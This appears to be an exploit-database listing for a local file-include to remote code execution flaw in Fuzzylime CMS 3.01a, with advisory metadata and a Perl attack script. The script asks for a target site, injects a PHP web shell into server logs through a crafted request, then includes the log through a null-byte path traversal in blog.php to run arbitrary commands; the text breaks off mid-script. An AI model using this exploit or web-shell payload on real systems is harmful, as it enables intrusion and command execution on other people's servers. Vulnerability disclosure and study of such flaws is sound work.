header-logo
Suggest Exploit
vendor:
CMS
by:
Cod3rZ
7.5
CVSS
HIGH
Local File-Include Vulnerability
94
CWE
Product Name: CMS
Affected Version From: 3.01a
Affected Version To: 3.01a
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Fuzzylime CMS 3.01 LFI / RCE

An attacker can exploit this issue to execute arbitrary local script code. This can allow the attacker to obtain sensitive information that may aid in further attacks.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/30121/info

'fuzzylime (cms)' is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary local script code. This can allow the attacker to obtain sensitive information that may aid in further attacks.

This issue affects fuzzylime (cms) 3.01a; other versions may also be affected. 

#!/usr/bin/perl
# Fuzzylime CMS 3.01 LFI / RCE
# author  : Cod3rZ
# website : http://cod3rz.helloweb.eu
#
# http://[site]/blog.php?file=../[file]\0
# LFI TO RCE
use LWP::UserAgent;
 system("cls");
#system("clear");
 print " -------------------------------------------------\n";
 print " Fuzzylime CMS 3.01 LFI / RCE                     \n";
 print " Powered by Cod3rZ                                \n";
 print " http://cod3rz.helloweb.eu                        \n";
 print " -------------------------------------------------\n";
 print " Insert Site (http://site.com/):                  \n ";
 chomp($site = <STDIN>);
 print " -------------------------------------------------\n";
 print " Insert Logs path                                 \n ";
 chomp($path = <STDIN>);
 print " -------------------------------------------------\n";
 
 #Infect Logs
 $lwp = LWP::UserAgent->new;
 $siten = $site.'/blog.php?file=';
 $ua = $lwp->get($site.'coderz <?php passthru(stripslashes($_GET[cmd])); ?> /coderz');
 #Control
 $ua = $lwp->get($site.$path.'%00');
 if($ua->content =~ m/cod3rz/) {
 print " Ok ".$site." is infected                         \n";
 print " -------------------------------------------------\n";
 print " ".$siten.$path."&cmd=[command]\\0                 \n";
 print " --